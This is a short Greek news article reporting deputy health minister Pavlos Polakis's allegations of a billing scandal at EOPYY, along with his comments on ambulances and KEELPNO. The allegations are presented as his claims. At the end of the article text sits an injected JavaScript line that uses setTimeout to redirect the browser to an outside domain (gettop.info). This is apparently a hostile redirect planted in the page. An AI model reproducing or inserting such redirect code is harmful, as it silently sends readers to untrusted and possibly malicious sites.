Πολάκης: Σκάνδαλο στον ΕΟΠΥΥ με κομπίνα Σαλμά

0
10

 

Για σκάνδαλο στον ΕΟΠΠΥ στο οποίο εμπλέκονται πολιτικά στελέχη αναφορικά με την υπόθεση με τα παραπεμπτικά διαγνωστικής αρθροσκόπησης, έκανε λόγο ο αναπληρωτής υπουργός Υγείας Παύλος Πολάκης.

Μιλώντας στην ΕΡΤ έκανε λόγο για κομπίνα του κ. Σαλμά και των γαμπρών του και στην οποία, όπως είπε, εμπλέκονται Βορίδης, Σκανδαλάκης και Πατούλης. Είπε χαρακτηριστικά πως τιμολόγησαν με το κόστος της κανονικής αρθροσκόπησης που περιλαμβάνει και διήμερη νοσηλεία την αρθροσκόπηση που γίνεται με τη σύγχρονη τεχνολογία.

Τόνισε, επίσης, ότι γίνεται προσπάθεια ανάταξης του συστήματος αλλά και για καθυστερήσεις λόγω ενός «σαπημένου κράτους».

Ο κ. Πολάκης είπε πως υπήρχαν σκανδαλώδεις διαδικασίες στην αγορά ασθενοφόρων του ΕΚΑΒ στο παρελθόν και τόνισε ότι έχουν αγοραστεί ήδη 90 νέα ασθενοφόρα, ενώ ακόμη 20 που είχαν αγοραστεί από Περιφέρειες και Δήμους «κάθονταν» ανενεργά σε κέντρα υγείας.

Αναφερόμενος στο ΚΕΕΛΠΝΟ, το χαρακτήρισε απόστημα, κεντρικό μηχανισμό μεταφοράς μαύρου χρήματος και ελέγχου των Μέσων ενημέρωσης.

«Ο κατήφορος του συστήματος σταμάτησε αλλά υπάρχουν ακόμη βαθιές πληγές και έχουμε πλήρη συναίσθηση», επισήμανε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here